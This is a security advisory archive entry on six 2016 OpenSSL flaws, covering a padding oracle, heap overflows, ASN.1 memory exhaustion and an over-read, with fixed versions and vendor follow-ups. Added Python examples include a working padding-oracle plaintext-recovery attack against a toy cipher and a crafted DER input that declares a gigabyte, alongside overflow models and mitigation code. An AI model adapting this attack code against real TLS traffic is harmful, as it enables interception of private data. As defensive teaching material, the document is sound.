SecurityTracker.com
SecurityTracker Archives

Category:  Application (VPN) > OpenSSL
Vendor:  OpenSSL.org
OpenSSL Multiple Bugs Let Remote Users Decrypt Data, Deny Service, Obtain Potentially Sensitive Information, and Potentially Execute Arbitrary Code
SecurityTracker Alert ID:  1035721
SecurityTracker URL:  http://securitytracker.com/id/1035721
CVE Reference:   CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2176
Date:  May 3 2016
Impact:   Denial of service via local system, Denial of service via network, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to versions 1.0.1t, 1.0.2h
Description:   Multiple vulnerabilities were reported in OpenSSL. A remote user positioned as a man-in-the-middle can decrypt traffic in certain cases. A remote or local user can cause denial of service conditions. A remote user can obtain potentially sensitive information from the target system. A remote or local user may be able to execute arbitrary code in an application that uses OpenSSL.

A remote user positioned as a man-in-the-middle can mount a padding oracle attack and decrypt traffic when the connection uses an AES CBC cipher suite and the server uses the AES-NI code path [CVE-2016-2107]. The rewritten padding check reads and compares a fixed number of bytes against either the MAC or the padding so that it runs in constant time, but it no longer verified that the record contained enough data to hold both the MAC and the padding, which gives the attacker a response to malformed padding that is distinguishable from a MAC failure.

[Editor's note: This vulnerability was introduced by the fix for a previous vulnerability, the Lucky 13 padding attack (CVE-2013-0169).]

Juraj Somorovsky reported this vulnerability.
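The attack described above, as an added example that is not from this advisory and not OpenSSL code: a toy CBC construction (a SHA-256 Feistel network stands in for AES so the script runs offline), TLS 1.x style padding, an oracle that answers only whether a decrypted record had well-formed padding, and the byte-at-a-time recovery a man-in-the-middle performs with it. The key, IV and "secret" are constructed inline; the oracle's True/False stands in for the distinguishable server response that the vulnerable AES-NI path produced.

```python
import hashlib

BLOCK = 16
HALF = BLOCK // 2

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(half: bytes, key: bytes, rnd: int) -> bytes:
    # Keyed PRF as the Feistel round function: a stand-in block cipher, not AES.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:HALF]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:HALF], block[HALF:]
    for rnd in range(4):
        l, r = r, _xor(l, _round(r, key, rnd))
    return l + r

def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _round(l, key, rnd)), l
    return l + r

def tls_pad(data: bytes) -> bytes:
    # TLS 1.x CBC padding: padlen + 1 trailing bytes, every one equal to padlen.
    padlen = (BLOCK - 1 - len(data)) % BLOCK
    return data + bytes([padlen]) * (padlen + 1)

def tls_unpad(data: bytes) -> bytes:
    padlen = data[-1]
    if padlen + 1 > len(data) or any(b != padlen for b in data[-(padlen + 1):]):
        raise ValueError("bad padding")
    return data[:-(padlen + 1)]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def make_oracle(key: bytes):
    # The leak: "was the padding well formed?". A real server also checks the
    # MAC, but the vulnerable path let a MITM tell the two failures apart.
    def oracle(prev_block: bytes, target_block: bytes) -> bool:
        try:
            tls_unpad(cbc_decrypt(key, prev_block, target_block))
            return True
        except ValueError:
            return False
    return oracle

def attack_block(oracle, prev_block: bytes, target_block: bytes) -> bytes:
    """Recover one plaintext block with at most 256 oracle queries per byte."""
    inter = bytearray(BLOCK)            # D_k(target_block), found right to left
    for pos in range(BLOCK - 1, -1, -1):
        padlen = BLOCK - 1 - pos        # aim for bytes pos..15 all == padlen
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padlen
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), target_block):
                continue
            if pos == BLOCK - 1:
                # Edge case: padding may pass because byte 14 happens to match a
                # padlen >= 1. Flip byte 14; a genuine padlen of 0 still passes.
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe), target_block):
                    continue
            inter[pos] = guess ^ padlen
            break
        else:
            raise RuntimeError("no valid padding found at byte %d" % pos)
    return _xor(bytes(inter), prev_block)

def recover_plaintext(oracle, iv: bytes, ct: bytes) -> bytes:
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(attack_block(oracle, blocks[i - 1], blocks[i])
                    for i in range(1, len(blocks)))

def demo() -> bool:
    # Constructed sample traffic: the attacker sees iv and ct and has the oracle.
    key = bytes(range(16))
    iv = b"\x00" * BLOCK
    secret = b"Cookie: session=8c2f4e1a9b7d03e6\r\n"
    ct = cbc_encrypt(key, iv, tls_pad(secret))
    return tls_unpad(recover_plaintext(make_oracle(key), iv, ct)) == secret
```

The probe at the last byte is the classic edge case: a guess can pass because the preceding byte happens to match a padding length of one or more, so the attacker flips byte 14 and keeps only a guess that still passes. Against a real server each query is one TLS record, so a block costs a few thousand records; the fix restores the length check so that padding and MAC failures are indistinguishable again, which removes the oracle.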

A remote or local user can supply very large amounts of data to overflow a length check in the EVP_EncodeUpdate() function (Base64 encoding), corrupting the heap and causing the target application to crash or potentially execute arbitrary code [CVE-2016-2105]. Within OpenSSL this function is reached mainly through the PEM_write_bio* family, which is used primarily by the command-line tools; applications that call these functions directly with very large amounts of untrusted data may be affected.

Guido Vranken reported this vulnerability.

A remote or local user can supply very large amounts of data to the EVP_EncryptUpdate() function after a previous call left a partial block buffered, causing a length check to overflow, corrupting the heap and causing the target application to crash or potentially execute arbitrary code [CVE-2016-2106]. OpenSSL's own internal use of the function cannot trigger the overflow; applications that call EVP_EncryptUpdate() directly with very large amounts of untrusted data may be affected.

Guido Vranken reported this vulnerability.
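The two length-check overflows above, modelled as an added example that is not OpenSSL source: the decision EVP_EncryptUpdate() made for a buffered partial block before the fix (an `i + inl < bl` comparison in C `int`, which wraps negative for an `inl` near INT_MAX and sends a huge memcpy into the 32-byte partial-block buffer), the overflow-safe `bl - i > inl` form the fix uses, and a caller-side bound for code that passes untrusted lengths to Update-style APIs. The C arithmetic is simulated with an explicit 32-bit wrap; the comparison forms are reconstructed to show the pattern, not copied line for line, and EVP_EncodeUpdate()'s overflow is the same class in the Base64 encoder's output-length accounting rather than this exact comparison. The `update` callback in `feed_in_chunks` is a hypothetical wrapper, not an OpenSSL binding.

```python
INT_MAX = 2**31 - 1
BLOCK_SIZE = 16
BUF_SIZE = 32          # the partial-block buffer inside the cipher context

def c_int(x: int) -> int:
    """Wrap to a 32-bit two's-complement int, as the CPU does for C `int`."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x

def vulnerable_buffers_input(buffered: int, inl: int, bl: int = BLOCK_SIZE) -> bool:
    """Pre-fix shape of the check, `if (i + inl < bl)`: when true, `inl` bytes
    are memcpy'd into the 32-byte partial-block buffer at offset `i`."""
    return c_int(buffered + inl) < bl

def fixed_buffers_input(buffered: int, inl: int, bl: int = BLOCK_SIZE) -> bool:
    """Post-fix shape, `if (bl - i > inl)`: bl - i is a small positive number,
    so no intermediate result can wrap whatever `inl` is; non-positive
    lengths are rejected up front."""
    if inl <= 0:
        return False
    return bl - buffered > inl

def bytes_written_past_buffer(buffered: int, inl: int) -> int:
    """How far a copy of `inl` bytes at offset `buffered` overruns the buffer."""
    return max(0, buffered + inl - BUF_SIZE)

def compare(buffered: int, inl: int) -> dict:
    """Side-by-side decision of both checks for one (buffered, inl) pair."""
    return {
        "vulnerable_copies": vulnerable_buffers_input(buffered, inl),
        "fixed_copies": fixed_buffers_input(buffered, inl),
        "overrun_if_copied": bytes_written_past_buffer(buffered, inl),
    }

def feed_in_chunks(update, data: bytes, max_chunk: int = 1 << 20) -> bytes:
    """Caller-side mitigation: never hand an Update-style API a length that
    approaches INT_MAX. `update(chunk) -> bytes` is a hypothetical wrapper
    around EVP_EncryptUpdate()/EVP_EncodeUpdate() (assumption, not OpenSSL's
    API); the bound keeps every single call far from the overflow, with
    headroom for the 4:3 expansion of Base64 output."""
    if max_chunk <= 0 or max_chunk > INT_MAX // 4:
        raise ValueError("max_chunk must leave headroom below INT_MAX")
    out = bytearray()
    for off in range(0, len(data), max_chunk):
        out += update(data[off:off + max_chunk])
    return bytes(out)
```

With one byte buffered and `inl = INT_MAX`, the pre-fix comparison wraps to a negative number, takes the "fits in the buffer" branch and copies two gigabytes into a 32-byte array; the post-fix form rejects the same input. Chunking is the belt-and-braces control for callers, since the fix only lands once every linked copy of libcrypto is updated.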

A remote or local user can supply a short, invalid ASN.1 encoding that declares a large length to an application that reads ASN.1 data from an untrusted BIO (for example via d2i_CMS_bio()); the library allocates memory for the declared length before the data arrives, so a few bytes of input can consume excessive memory or exhaust it [CVE-2016-2109]. The memory-based functions such as d2i_X509() are not affected, and TLS applications are not affected.

Brian Carpenter reported this vulnerability.
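The allocation pattern behind that issue, as an added example that is not OpenSSL code: a minimal DER header reader over a BIO-like stream, the pre-fix mistake of sizing the buffer to the declared length before any content has been read, and the bounded alternative that caps the declared length and grows the buffer only as bytes actually arrive. Single-byte tags are assumed, the 64 MiB cap is an illustrative policy value, and the two inputs are constructed.

```python
import io

CHUNK = 1 << 16          # grow the buffer per read, never by the declared length
MAX_OBJECT = 64 << 20    # illustrative policy cap on one ASN.1 object from the network

def read_der_header(bio) -> tuple:
    """Read a DER tag and length from a BIO-like stream; return (tag, length).

    Only single-byte tags are handled (assumption). Indefinite lengths and
    non-minimal long forms are rejected, as DER requires."""
    head = bio.read(2)
    if len(head) < 2:
        raise ValueError("truncated header")
    tag, first = head[0], head[1]
    if first < 0x80:
        return tag, first
    if first == 0x80:
        raise ValueError("indefinite length is not DER")
    n = first & 0x7F
    if n > 4:
        raise ValueError("length-of-length %d is not supported" % n)
    lb = bio.read(n)
    if len(lb) < n:
        raise ValueError("truncated length field")
    length = int.from_bytes(lb, "big")
    if lb[0] == 0 or length < 0x80:
        raise ValueError("non-minimal DER length")
    return tag, length

def naive_allocation(data: bytes) -> int:
    """Pre-fix pattern: size the buffer to the declared length *before* reading
    the body. Six bytes of input can demand a gigabyte."""
    _, length = read_der_header(io.BytesIO(data))
    return length

def bounded_read(data: bytes, max_len: int = MAX_OBJECT) -> bytes:
    """Post-fix pattern: cap the declared length, then grow only as bytes arrive."""
    bio = io.BytesIO(data)
    _, length = read_der_header(bio)
    if length > max_len:
        raise ValueError("declared length %d exceeds cap %d" % (length, max_len))
    body = bytearray()
    while len(body) < length:
        chunk = bio.read(min(CHUNK, length - len(body)))
        if not chunk:
            raise ValueError("truncated body: declared %d, got %d" % (length, len(body)))
        body += chunk
    return bytes(body)

def try_bounded_read(data: bytes) -> tuple:
    """(status, payload_or_reason) so callers can log rejections uniformly."""
    try:
        return "ok", bounded_read(data)
    except ValueError as err:
        return "rejected", str(err)

# Constructed inputs: a SEQUENCE claiming 1 GiB of content with no body at all,
# and a well-formed SEQUENCE { INTEGER 5 }.
HOSTILE = bytes([0x30, 0x84, 0x40, 0x00, 0x00, 0x00])
BENIGN = bytes([0x30, 0x03, 0x02, 0x01, 0x05])
```

The cap is the policy decision a practitioner has to make per protocol (a CMS blob and a certificate have very different plausible sizes); the chunked growth is what makes a truncated or slow stream cost only what it has actually sent.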

An application that passes an ASN.1 string longer than 1024 bytes to X509_NAME_oneline() on an EBCDIC system triggers a buffer over-read; arbitrary stack data, potentially including sensitive information, is returned in the output buffer [CVE-2016-2176].

Guido Vranken reported this vulnerability.

The ASN.1 encoder can also be made to corrupt memory [CVE-2016-2108]. Encoding the value zero represented as a negative integer causes a buffer underflow with an out-of-bounds write in i2c_ASN1_INTEGER(). The parser does not normally produce such a "negative zero", but a second parser bug (misinterpreting an ANY field carrying a large universal tag) lets crafted input create one, so applications that parse and re-encode X.509 certificates are known to be affected, and applications that verify RSA signatures on certificates may be, because a certificate with a valid signature is re-encoded. The underlying bug was fixed in the June 2015 security releases before its security impact was known; the vendor advisory rates this issue high severity.

Huzaifa Sidhpurwala (Red Hat), Hanno Böck, and David Benjamin (Google) reported this vulnerability.

Impact:   A remote user can decrypt traffic in certain cases.

A remote or local user may be able to execute arbitrary code on the target application that uses OpenSSL.

A remote or local user can cause denial of service conditions on the target system.

A remote user can obtain potentially sensitive information on the target system.

Solution:   The vendor has issued a fix (1.0.1t, 1.0.2h).

The vendor's advisory is available at:

https://www.openssl.org/news/secadv/20160503.txt
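A version check for the fix above, as an added example that is not from the advisory or from OpenSSL: it parses an `openssl version` string, orders OpenSSL's letter suffixes correctly (a..z, then za, zb, ...), and classifies the build against the fixed releases named here. Distribution packages that backport the fixes keep the upstream version string, so for RHEL, Debian, Ubuntu and similar builds the package changelog or the vendor follow-ups listed in the message history are authoritative, not this string comparison.

```python
import re
import subprocess

# Fixed releases named in the advisory, per affected branch.
FIXED_IN = {(1, 0, 1): "t", (1, 0, 2): "h"}
# Branches already out of support on the advisory date; no fix was issued for them.
UNSUPPORTED = {(0, 9, 8), (1, 0, 0)}

_VER = re.compile(r"(\d+)\.(\d+)\.(\d+)([a-z]*)")

def parse_version(text: str):
    """'OpenSSL 1.0.2g  1 Mar 2016' -> ((1, 0, 2), 'g'); None if no version found."""
    m = _VER.search(text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))), m.group(4)

def letter_key(letters: str) -> tuple:
    # OpenSSL patch letters run a..z and then za, zb, ...: order by length first.
    return (len(letters), letters)

def classify(text: str) -> str:
    """'vulnerable', 'fixed', 'unsupported-branch', 'not-in-scope' or 'unknown'."""
    parsed = parse_version(text)
    if parsed is None:
        return "unknown"
    branch, letters = parsed
    if branch in UNSUPPORTED:
        return "unsupported-branch"
    if branch not in FIXED_IN:
        return "not-in-scope"      # e.g. 1.1.0 pre-releases: not covered by this advisory
    if letter_key(letters) >= letter_key(FIXED_IN[branch]):
        return "fixed"
    return "vulnerable"

def local_classification(binary: str = "openssl") -> str:
    """Run `openssl version` on this host and classify its output.

    Caveat (see lead-in): meaningless for distribution builds that backport
    fixes without bumping the upstream version string."""
    try:
        out = subprocess.run([binary, "version"], capture_output=True,
                             text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return "unknown"
    return classify(out)
```

The suffix ordering matters for scripted checks: a plain string comparison puts "1.0.1t" after "1.0.1s" correctly but would also rank "0.9.8z" above "0.9.8zh", which is why the key orders by suffix length before letters.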

Vendor URL:  www.openssl.org/news/secadv/20160503.txt
Cause:   Boundary error (integer overflow, out-of-bounds write, buffer over-read), Resource exhaustion, Cryptographic padding oracle
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 4 2016: Ubuntu has issued a fix for Ubuntu Linux 12.04 LTS, 14.04 LTS, 15.10, and 16.04 LTS.
May 5 2016: FreeBSD has issued a fix for FreeBSD 9.3, 10.1, 10.2, and 10.3.
May 7 2016: Cisco has issued an advisory for Cisco Unified MeetingPlace.
May 7 2016: Cisco has issued an advisory for Cisco WebEx Meetings Server 1.x and 2.x.
May 7 2016: Cisco has issued an advisory for Cisco Jabber Guest.
May 7 2016: Cisco has issued an advisory for Cisco ASA Next-Generation Firewall Services.
May 7 2016: Cisco has issued an advisory for Cisco Email Security Appliance/Cisco IronPort Encryption Appliance.
May 9 2016: Cisco has issued an advisory for Cisco WebEx Meeting Center.
May 9 2016: Cisco has issued an advisory for Cisco Network Analysis Module.
May 9 2016: Cisco has issued an advisory for Cisco Prime Collaboration Deployment.
May 9 2016: Cisco has issued an advisory for Cisco Prime Infrastructure Standalone Plug and Play Gateway.
May 9 2016: Cisco has issued an advisory for Cisco Digital Media Products.
May 9 2016: Cisco has issued an advisory for Cisco Prime Security Manager.
May 9 2016: Cisco has issued an advisory for Cisco Show and Share.
May 9 2016: Cisco has issued an advisory for Cisco Connected Grid Products.
May 9 2016: Cisco has issued an advisory for Cisco Nexus 1000V Series Switches.
May 9 2016: Cisco has issued an advisory for Cisco ATA 190 and 187 Analog Telephone Adaptors.
May 9 2016: Red Hat has issued a fix for Red Hat Enterprise Linux 7.
May 9 2016: Cisco has issued an advisory for Cisco IP Phones.
May 9 2016: CentOS has issued a fix for CentOS 7.
May 9 2016: Cisco has issued an advisory for Cisco Video Surveillance Cameras and Server.
May 9 2016: Oracle has issued a fix for Oracle Linux 7.
May 9 2016: Cisco has issued an advisory for Cisco Media Experience Engine MXE3500.
May 9 2016: Cisco has issued an advisory for Cisco TelePresence Server and VCS.
May 11 2016: Pulse Secure has issued an advisory for Pulse Connect Secure.
May 19 2016: OpenBSD has issued a fix for OpenBSD 5.8 and 5.9.
May 21 2016: Citrix has issued a fix for Citrix XenServer.
May 26 2016: AttachmateWRQ has issued a fix for Attachmate Reflection for Secure IT.
May 26 2016: HPE has issued an advisory for HPE IceWall.
May 31 2016: Red Hat has issued a fix for Red Hat Enterprise Linux 5.
Jun 1 2016: Oracle has issued a fix for Oracle Linux 5.
Jun 17 2016: QNAP Systems has issued a fix for QNAP Storage Devices.
Jun 21 2016: IBM has issued a fix for IBM Proventia Network Enterprise Scanner.
Jun 22 2016: Oracle has issued a fix for Oracle Linux 5.
Jul 6 2016: IBM has issued a fix for IBM Tivoli Netcool Reporter 2.2.
Jul 6 2016: IBM has issued a fix for IBM Cognos Metric Manager.
Jul 8 2016: IBM has issued a fix for IBM Security Identity Manager Virtual Appliance.
Jul 13 2016: IBM has issued a fix for IBM AIX 5.3, 6.1, 7.1, and 7.2.
Jul 19 2016: Apple has issued a fix for Apple macOS/OS X.
Jul 19 2016: Oracle has issued a fix for MySQL.
Jul 19 2016: Oracle has issued a fix for Oracle Fusion Middleware (Oracle Exalogic Infrastructure and Oracle Access Manager).
Aug 9 2016: IBM has issued a fix for IBM Cognos TM1.
Aug 19 2016: Palo Alto Networks has issued a fix for Palo Alto PAN-OS.
Sep 13 2016: IBM has issued a fix for IBM Rational Team Concert.
Oct 18 2016: Red Hat has issued a fix for Red Hat Enterprise Linux 6.7.
Oct 18 2016: Oracle has issued a fix for Oracle E-Business Suite.
Oct 19 2016: Oracle has issued a fix for Oracle Enterprise Manager.
Oct 19 2016: Oracle has issued a fix for Oracle Health Sciences Applications.
Dec 15 2016: Red Hat has issued a fix for Red Hat JBoss for Red Hat Enterprise Linux.
Jan 26 2017: Red Hat has issued a fix for Red Hat JBoss Core Services for Red Hat Enterprise Linux 6 and 7.
Feb 14 2017: HPE has issued a fix for HPE Discovery & Dependency Mapping Inventory (DDMI).
Apr 11 2017: HPE has issued a fix for HPE Operations Agent.



Source Message Contents

[Original Message Not Available for Viewing]

Copyright 2019, SecurityGlobal.net LLC